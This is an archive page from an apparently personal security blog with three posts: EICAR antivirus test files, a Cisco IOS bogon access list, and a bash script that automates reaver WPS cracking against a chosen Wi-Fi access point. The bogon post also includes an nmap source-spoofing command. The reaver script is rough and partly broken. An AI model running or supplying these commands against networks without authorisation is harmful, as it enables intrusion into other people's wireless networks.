Category Archives: Tools/Scripts

IS your Antivirus working ?

Hello Everyone!

Every wondered if you antivirus is working ?

Ever wanted to test the real-time protection of your antivirus and its effectiveness of threat detection ?

Well there is a free online resource you can use to download different types if files such as .zip files .com or .html file that should set off you antivirus and flag it as a virus although this is not 100% fool proof as no antivirus or security measure is 100% but this will definitely test against the most basic of virus activity you even have the option of downloading the file via HTTP and HTTPS to see how your AV reacts

The site is located at http://www.eicar.org/85-0-Download.html

All in all this is a very useful tool for testing

Until next time stay secure !

Applying bogon access list Cisco IOS

Hello all,

Here is a little snippet of information on the importance of applying an access list to your edge router to IP blocks that are listed on the bogon list

What is the bogon list?

The bogon list is a list of ip subnets that are either invalid non routable ip blocks such as 192.168.0.0 or ip blocks that are not assigned

it is important to block these ip blocks from accessing your network as it eliminates the chance of a hacker spoofing his/her source ip address for an internal ip address for instance with nmap we can issue the following command to spoof our source ip address when scanning a target

nmap -S 192.168.0.1 192.168.1.1 -e eth0 -PN

now if you did not have a access list to block incoming traffic from this non routerable ip 192.168.0.1 the spoofed ip packet will then be able to pass through your router

here is a current bogon list that can be copied and pasted into a Cisco IOS device

copy from below the line

______

conf t

no access-list 101

access-list 101 deny ip 0.0.0.0 0.255.255.255 any
access-list 101 deny ip 10.0.0.0 0.255.255.255 any
access-list 101 deny ip 100.64.0.0 0.63.255.255 any
access-list 101 deny ip 127.0.0.0 0.255.255.255 any
access-list 101 deny ip 169.254.0.0 0.0.255.255 any
access-list 101 deny ip 172.16.0.0 0.15.255.255 any
access-list 101 deny ip 192.0.0.0 0.0.0.255 any
access-list 101 deny ip 192.0.2.0 0.0.0.255 any
access-list 101 deny ip 192.168.0.0 0.0.255.255 any
access-list 101 deny ip 198.18.0.0 0.1.255.255 any
access-list 101 deny ip 198.51.100.0 0.0.0.255 any
access-list 101 deny ip 203.0.113.0 0.0.0.255 any
access-list 101 deny ip 224.0.0.0 31.255.255.255 any
access-list 101 permit ip any any

end

conf t
int f0/0
ip access-group 101 in
end

write

_______

The above access list will block all the ip blocks on the bogon list
this small step should be apart of network security best practices
for any sized network its simple to apply and can stop many types of attacks

Till next time stay secure !

Sean Mancini

Automate reaver Exploit

Hello all,

Here is a simple script to automate and explorer the reaver exploit and test your
Wi-Fi access points againts reaver

The below assumes you have reavers installed !

Please Note: This information and script is for educational purposes only
i am not respoisble for any actions taken on your part !

to use this script type in the following command in your terminal

sudo nano filename.sh
copy and paste the below script
ctrl-o then hit enter
ctrl-x then hit enter
chmod +x filename.sh

To run this script in your terminal type ./filename.sh

Start of script
#!/bin/bash

echo “Its cracking time !!!!!!”
sudo iwconfig
sudo airmon-ng start wlan0
sudo airmon-ng start mon0
sudo airodump-ng mon0
echo “Enter the bssid ”
read bssid

sudo reaver -i mon0 -b $bssid -vv

if $bssid =” no ”
then end
fi

sudo airmon-ng stop mon0
sudo airmon-ng stop mon1
sudo airmon-ng stop mon2
sudo airmon-ng stop mon3

echo “Good bye sir ”